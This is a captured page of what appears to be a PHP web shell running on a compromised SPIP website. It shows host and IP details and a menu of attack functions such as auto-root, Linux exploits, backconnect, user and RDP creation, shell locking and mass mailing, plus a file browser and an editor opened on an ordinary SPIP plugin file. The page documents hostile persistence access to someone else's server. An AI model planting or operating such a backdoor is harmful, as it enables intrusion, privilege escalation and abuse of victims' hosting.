Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
afficher_liste.php
3.62
KB
-rw----r--
afficher_nom_plugin.php
1.84
KB
-rw----r--
afficher_plugin.php
11
KB
-rw----r--
afficher_repertoires.php
3.59
KB
-rw----r--
extraire_boutons.php
1.87
KB
-rw----r--
extraire_pipelines.php
1.27
KB
-rw----r--
get_infos.php
3.72
KB
-rw----r--
infos_paquet.php
12.08
KB
-rw----r--
installer.php
6.75
KB
-rw----r--
verifie_conformite.php
6.78
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : extraire_boutons.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Analyser un arbre xml et extraire les infos concernant les boutons et onglets * * @param array $arbre * @return array */ function plugins_extraire_boutons_dist($arbre) { $les_boutons = null; $ret = ['bouton' => [], 'onglet' => []]; // recuperer les boutons et onglets si necessaire spip_xml_match_nodes(',^(bouton|onglet)\s,', $arbre, $les_boutons); if (is_array($les_boutons) && count($les_boutons)) { $ret['bouton'] = []; $ret['onglet'] = []; foreach ($les_boutons as $bouton => $val) { $bouton = spip_xml_decompose_tag($bouton); $type = reset($bouton); $bouton = end($bouton); if (isset($bouton['id'])) { $id = $bouton['id']; $val = reset($val); if (is_array($val)) { $ret[$type][$id]['parent'] = $bouton['parent'] ?? ''; $ret[$type][$id]['position'] = $bouton['position'] ?? ''; $ret[$type][$id]['titre'] = isset($val['titre']) ? trim(spip_xml_aplatit($val['titre'])) : ''; $ret[$type][$id]['icone'] = isset($val['icone']) ? trim(end($val['icone'])) : ''; $ret[$type][$id]['action'] = isset($val['url']) ? trim(end($val['url'])) : ''; $ret[$type][$id]['parametres'] = isset($val['args']) ? trim(end($val['args'])) : ''; } } } } return $ret; }
Close